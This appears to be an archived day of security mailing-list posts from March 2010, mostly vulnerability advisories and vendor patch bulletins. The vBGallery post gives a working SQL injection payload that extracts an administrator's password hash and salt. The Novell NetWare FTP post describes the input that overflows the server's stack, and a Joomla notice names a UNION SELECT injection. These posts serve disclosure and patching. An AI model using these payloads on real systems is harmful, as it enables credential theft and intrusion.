Vulnerabilities in ArcManager

2010-03-29 Thread MustLive

Hello Bugtraq!

I want to warn you about security vulnerabilities in ArcManager.

Advisory: Vulnerabilities in ArcManager
17.03.2010 - found vulnerabilities.
22.03.2010 - disclosed at my site.
23.03.2010 - informed developers.

These are Insufficient Anti-automation and Denial of Service

The vulnerabilities exist in captcha script CaptchaSecurityImages.php, which
is using in this system. I already reported about vulnerabilities in
CaptchaSecurityImages (

Insufficient Anti-automation:


Captcha bypass is possible as via half-automated or automated (with using of
OCR) methods, which were mentioned before (,
as with using of session reusing with constant captcha bypass method
(, which was described in project Month of
Bugs in Captchas.



With setting of large values of width and height it's possible to create
large load at the server.

Vulnerable are all versions of ArcManager.

Best wishes  regards,
Administrator of Websecurity web site

[security bulletin] HPSBOV02497 SSRT090245 rev.2 - HP TCP/IP Services for OpenVMS Running NTP, Remote Execution of Arbitrary Code, Denial of Service (DoS)

2010-03-29 Thread security-alert
Hash: SHA1


Document ID: c01961959
Version: 2

HPSBOV02497 SSRT090245 rev.2 - HP TCP/IP Services for OpenVMS Running NTP, 
Remote Execution of Arbitrary Code, Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-03-23
Last Updated: 2010-03-26

Potential Security Impact: Remote execution of arbitrary code, Denial of 
Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

Potential security vulnerabilities have been identified with HP TCP/IP Services 
for OpenVMS Running NTP. The vulnerabilities could be remotely exploited to 
execute arbitrary code or create a Denial of Service (DoS).

References: SSRT090073, CVE-2009-0159, CVE-2009-1252, CVE-2009-3563

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP TCP/IP Services for OpenVMS v5.5 and v5.6 on Itanium and Alpha platforms.


CVSS 2.0 Base Metrics
  Reference  Base Vector Base Score
CVE-2009-0159(AV:N/AC:M/Au:N/C:P/I:P/A:P)   6.8
CVE-2009-1252(AV:N/AC:M/Au:N/C:P/I:P/A:P)   6.8
CVE-2009-3563(AV:N/AC:L/Au:N/C:N/I:P/A:P)   6.4
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002


HP has made the following patch kits available to resolve the vulnerability.
Patch kit installation instructions are provided in the file readme.txt .
The patch kits and installation instructions are available from the following 
location using ftp:

HostAccount   Password  vmstcpip  vmsTcp1p

NTP for HP OpenVMS TCPIP patch kits are available for both ALPHA and ITANIUM 

HP OpenVMS TCPIP VersionPlatformPatch kit LocationPatch kit Image
v 5.5 ECO 3 ALPHA   NTP_V55/ECO3/ 
v 5.5 ECO 3 Itanium NTP_V55/ECO3/ 
v 5.6 ECO 4 ALPHA   NTP_V56/ECO4/ 
v 5.6 ECO 4 Itanium NTP_V56/DCO4/ 
v 5.6 ECO 5 ALPHA   NTP_V56/ECO5/ 
v 5.6 ECO 5 Itanium NTP_V56/ECO5/ 


Version:1 (rev.1) 23 March 2010 Initial release
Version:2 (rev.2) 26 March 2010 Updated CVE reference and patck kit information

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to:
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription:
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit:

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
NS = HP NonStop Servers
PI = HP Printing  Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 

HP is broadly distributing this Security Bulletin in order to 

[SECURITY] [DSA 2023-1] New curl packages fix arbitrary code execution

2010-03-29 Thread Steffen Joeris
Hash: SHA1

Debian Security Advisory DSA-2023-1  Steffen Joeris
March 28, 2010

Package: curl
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id : CVE-2010-0734

Wesley Miaw discovered that libcurl, a multi-protocol file transfer
library, is prone to a buffer overflow via the callback function when
an application relies on libcurl to automatically uncompress data. Note
that this only affects applications that trust libcurl's maximum limit
for a fixed buffer size and do not perform any sanity checks themselves.

For the stable distribution (lenny), this problem has been fixed in
version 7.18.2-8lenny4.

Due to a problem with the archive software, we are unable to release all
architectures simultaneously. Binaries for the hppa, ia64, mips, mipsel
and s390 architectures will be provided once they are available.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem has been fixed in version 7.20.0-1.

We recommend that you upgrade your curl packages.

Upgrade instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- ---

Debian GNU/Linux 5.0 alias lenny

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:
Size/MD5 checksum: 1419 0b91fb707442ec5f1dff454ddd0d2679
Size/MD5 checksum:  2273077 4fe99398a64a34613c9db7bd61bf6e3c
Size/MD5 checksum:29053 205ea45b37707ca44847a0bb953a108e

alpha architecture (DEC Alpha)
Size/MD5 checksum:   224560 39c97dc3fc8adfe369d050d4ccd57112
Size/MD5 checksum:   211362 d04f5a02fbce3a0ed6b757e36aa21f37
Size/MD5 checksum:   986188 ca28494e3f9ee836f9893608e5f82c1b
Size/MD5 checksum:  1150648 b33b695186a2f70f00fdf1dacfb25b62
Size/MD5 checksum:   958014 ba4136dd3c9e204c03d7793d06f1205e
Size/MD5 checksum:   241806 b0bca91ebffa1b09ddf9ea07004423d4

amd64 architecture (AMD x86_64 (AMD64))
Size/MD5 checksum:   933302 b14bed60c0ff0d9f5647c7624bce4290
Size/MD5 checksum:   209380 803de8e14287846ceae6f12a011d48bf
Size/MD5 checksum:   215342 4ee8ef24407aa837b37ada3b7c261047
Size/MD5 checksum:  1182708 9e4b1721388b113033cbff04c764bfa1
Size/MD5 checksum:   231906 6f9ce83dd70ce4ec606adcaa78e11904
Size/MD5 checksum:   954234 8955fd4b4539044f08b074aae12d01e3

arm architecture (ARM)
Size/MD5 checksum:   222366 6a5c14d84303e3acfa699ba7fb14ed1a
Size/MD5 checksum:   208124 219373aea91cfde58dfa15c7237462bf

{PRL} Novell Netware FTP Remote Stack Overflow

2010-03-29 Thread Francis Provencher

Application:   Novell Netware FTP Remote Stack Overflow

Platforms:   Novell Netware 6.5 SP8

Exploitation:   Remote Code Execution

CVE Number:   CVE-2010-0625

Novell TID:   3238588

Discover Date:   2009-07-23

Author:   Francis Provencher (Protek Research Lab's)



1) Introduction
2) Report Timeline
3) Technical details
4) The Code


1) Introduction

Novell, Inc. is a global software and services company based in
Waltham, Massachusetts. The company specializes in enterprise
operating systems, such as SUSE

Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions, such as Novell
Groupwise and Novell


Novell was instrumental in making the Utah Valley a focus for
technology and software development. Novell technology contributed to
the emergence of local

area networks, which displaced the dominant mainframe computing model
and changed computing worldwide. Today, a primary focus of the company
is on developing

open source software for enterprise clients.



2) Report Timeline

2010-01-25 Vendor Contact
2010-01-26 Vendor repsonse
2010-03-26 Coordinate release of this advisory


3) Technical details

It's possible to overflow the stack and rewrite the EIP by sending a
mkdir and a rmdir request with these special caracters ~A/ 320 time.

The nlm version;

Netware FTP Server
Version 5.09.03 October 14 2008

The register;

Abend 1 on P00: Server-5.70.08: Page Fault Processor Exception (Error
code )
CS = 0008 DS = 0023 ES = 0023 FS = 0023 GS = 0023 SS = 0010
EAX = 0238 EBX = 7E2F417E ECX = 55AA08D4 EDX = 0001
ESI = 2F417E2F EDI = 429980C0 EBP = 417E2F41 ESP = A94A9FA4
EIP = 007E2F41 FLAGS = 00010282
Address (0x007E2F41) exceeds valid memory limit
EIP in UNKNOWN memory area
Access Location: 0x007E2F41


4) The Code

This issue can be trigger manually


London DEFCON March meet - DC4420 - Wednesday March 31st 2010

2010-03-29 Thread Major Malfunction
Yes, we've just managed to squeak in the last Wednesday of the month 
and, as autom8on failed to burn down the venue last month, we're back 
to have another go...

This month's lineup is:

The tekky one:

   DIY grid computing - it's easier than you think

   tqm will show how to create a simple grid and spread the load
   across many nodes using some brain cells, commodity hardware
   and some not-so-magic scripting

The fun one:

  Rocketry for fun and profit

  the hatter will show us some fun (if rather efficient) ways to
  turn spare money into smoke, and some tips on getting more *BANG*
  for your buck...

Other stuff you need to know...


  Upstairs at The Black Horse, 6 Rathbone Place, W1T 1HH

Nearest stations:

  Tottenham Court Road London Underground station (150m) - zone 1
  Goodge Street London Underground station (440m) - zone 1
  Oxford Circus London Underground station (630m) - zone 1
  Leicester Square London Underground station (680m) - zone 1
  Covent Garden London Underground station (750m) - zone 1


  Wednesday March 31st 2010
  Room owned from 18:00, assimilation starts at 20:00


  Yes, both kinds
  Last orders 23:00


  Yes, tasty
  Kitchen closes at 21:30




  We live in hope...


  Fight Club


In DEFCON, we have no names... errr... well, we do... but silly ones...

Medium security hole in Varnish reverse proxy

2010-03-29 Thread Tim Brown

I've identified a couple of security flaws affecting the Varnish reverse proxy 
which may allow privilege escalation. These issues were reported by email to 
the vendor but he feels that it is a configurational issue rather than a design 
flaw.  Whilst I can partially see his point in that the administrative 
interface can be disabled, I'm not convinced that making a C compiler 
available over a network interface without authentication is sound practice, 
especially when the resultant compiled code can be made to run as root rather 

Tim Brown

Description: PGP signature

Description: This is a digitally signed message part.

Exploiting nano

2010-03-29 Thread Dan Rosenberg
I just finished a blog post detailing how the popular text editor,
nano, is unsafe to run as root to edit untrusted users' files, with
consequences including full privilege escalation:

This is not a disclosure of vulnerabilities per se; rather, it's just
a look at how some security assumptions may not hold when running
programs as root in a hostile environment, using nano as an example.
Nothing earth-shattering, just thought some of you might be
interested.  Comments welcome.


SQL Injection Vulnerabilitie in PhotoPost vBGallery 2.5

2010-03-29 Thread Andreas Kirbach

Product Imnformation

PhotoPost vBGallery is a popular commercial Image Gallery Add-on für 
vBulletin which is being developed by All Enthusiasts, Inc.

PhotoPost vBGallery 2.5 allows the user to modify gallery settings for 
his profile page if the function is enabeld and the user has permission 
to do so.

For this function to work, PhotoPost vBGallery adds a Plug-in to hook 
The PHP code on this plug-in is being used to display a form which does 
allow the user to customize the settings and save the settings into the 

The SQL constructed for action updatevbgallery does contain variables 
that are not properly sanitized:

The POST variables profile_include and profile_exclude are treated as 
HTML-Safe strings ad unses with the SQL directly althou only 
commaseparated integers are valid.
POST variable profile_showimg is also processed as a HTML-safe string 
altouth only integer values are valid.
POST variable profile_column is also processed as a HTML-safe string but 
not being made SQL-safe.
POST variable array profile_imagebitdisplay is being stored without 
being made SQL-safe

Affected Version(s): 2.5
Not affected Versions: Versions prior to 2.5

This exploit shows how the get the password hash and salt of an 
administrator account.

- No table prefix is being used
- The gallery functions are enabled for member profiles
- User-ID of an adminitrator account is 1
- The vBulletin database error page is unmodified and shows the executed 
SQL as an HTML comment

- The account being used has permissions to modify gallery profil settings

1) Go to forumroot/profile.php?do=vbgalleryprofile
2) Using Firebug, remove the maxlength attribute for the input labeled 
Exclude Catagories

3) Enter
   ', profile_exclude = (SELECT CONCAT(password, '|||', salt) FROM user 
WHERE userid = 1), profile_include = '

   into the imnput field Exclude Catagories
4) Submit the form
5) Access your own profile page (forumroot/member.php?u=X)
5) The HTML source of the database error page will contain an HTML 
comment like

Invalid SQL:

SELECT  imageid, images.title, images.description, filename, 
thumbname, originalname, extension, images.catid  ,images.userid, 
images.username, images.description, images.dateline, images.views, 
posts ,width, height, originalwidth, originalheight ,filesize, 
originalfilesize, images.lastpostdateline, images.lastpostuserid, 
images.lastpostusername, votenum, votetotal, categories.title AS cattitle

FROM ppgal_images AS images
LEFT JOIN ppgal_categories AS categories USING (catid)
WHERE  valid = 1  AND images.userid = 5

AND images.catid NOT IN (abcdef12344777148822d7530f089fbd|||.%/)
AND images.thumbname != ''
The string after AND images.catid NOT IN (  is the password hash and 
salt of user ID 1 separated by |||

Suggested Fixes
Properly sanitize user input and run strings trough $db-escape_string() 
before saving them into the database

All Enthusiasts, Inc. was informed about this vulnerbilitie on 
2010/03/17 but has not yet released a patch.

Remote buffer overflow in aircrack-ng causes DOS and possible code execution

2010-03-29 Thread Lukas Lueg
We can cause aircrack-ng and airdecap-ng to crash when reading
specially crafted dump-files and can also crash remote airodump-ng
sessions by sending specially crafted packets over the air. I am 90%
sure that this denial-of-service can be escalated to
remote-code-execution by carefully introducing new stations to
airodump-ng (for memory allocation) and then causing a heap corruption
as demonstrated.

The tools’ code responsible for parsing IEEE802.11-packets assumes the
self-proclaimed length of a EAPOL-packet to be correct and never to
exceed a (arbitrary) maximum size of 256 bytes for packets that are
part of the EAPOL-authentication. We can exploit this by letting the
code parse packets which:
a) proclaim to be larger than they really are, possibly causing the
code to read from invalid memory locations while copying the packet;
b) really do exceed the maximum size allowed and overflow data
structures allocated on the heap, overwriting libc’s
allocation-related structures. This causes heap-corruption.

Steps to Reproduce:
1. Get example file from; or
generate it via;
2. Run it through aircrack-ng, airdecap-ng or airodump-ng
(airodump-ng -r aircrackng_exploit.cap)

Vulnerabilities in MiniManager for Project MANGOS

2010-03-29 Thread MustLive

Hello Bugtraq!

I want to warn you about security vulnerabilities in MiniManager for Project

Advisory: Vulnerabilities in MiniManager for Project MANGOS
17.03.2010 - found vulnerabilities.
23.03.2010 - disclosed at my site.
24.03.2010 - informed developers.

These are Insufficient Anti-automation and Denial of Service

The vulnerabilities exist in captcha script CaptchaSecurityImages.php, which
is using in this system. I already reported about vulnerabilities in
CaptchaSecurityImages (

Insufficient Anti-automation:


Captcha bypass is possible as via half-automated or automated (with using of
OCR) methods, which were mentioned before (,
as with using of session reusing with constant captcha bypass method
(, which was described in project Month of
Bugs in Captchas.



With setting of large values of width and height it's possible to create
large load at the server.

Vulnerable MiniManager for Project MANGOS 0.15 and previous versions.

Best wishes  regards,
Administrator of Websecurity web site

XSS vulnerability in easy page cms

2010-03-29 Thread info
# Application Info:  
# Name: Easy Page
# Vendor:
# Vulnerability Info:
# Type: XSS
# Risk: low
# Discoverd By: Pouya Daneshmand  
# Website:  
# Contacts: info[at]  whh_iran[at]

Re: [Full-disclosure] Medium security hole in Varnish reverse proxy

2010-03-29 Thread John Adams
Post some code that people can evaluate.

For starters, There's no reason why varnish ever has to run as root.
It never listens on privileged ports, and the C compiler is never
available over a network interface.

You can ask varnish to reload a configuration and recompile it, but
you'd have to have write access to the filesystem first.  You an also
only cause recompilation to occur if the admin interface is up and
running, which can be easily disabled.

Poul is probably correct. Any vulnerabilities in Varnish with regards
to privilege escalation are configuration issues.


On Mon, Mar 29, 2010 at 12:49 AM, Tim Brown wrote:

 I've identified a couple of security flaws affecting the Varnish reverse proxy
 which may allow privilege escalation. These issues were reported by email to
 the vendor but he feels that it is a configurational issue rather than a 
 flaw.  Whilst I can partially see his point in that the administrative
 interface can be disabled, I'm not convinced that making a C compiler
 available over a network interface without authentication is sound practice,
 especially when the resultant compiled code can be made to run as root rather

 Tim Brown

 Full-Disclosure - We believe in it.
 Hosted and sponsored by Secunia -

Joomla Component com_xmap Sql Injection Vulnerability

2010-03-29 Thread info
# Application Info:
# Name: Joomla Component com_xmap
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
Vulnerability: UNION SELECT 
# Discoverd By: Pouya Daneshmand 
# Website:
# Contacts: admin[at]  whh_iran[AT]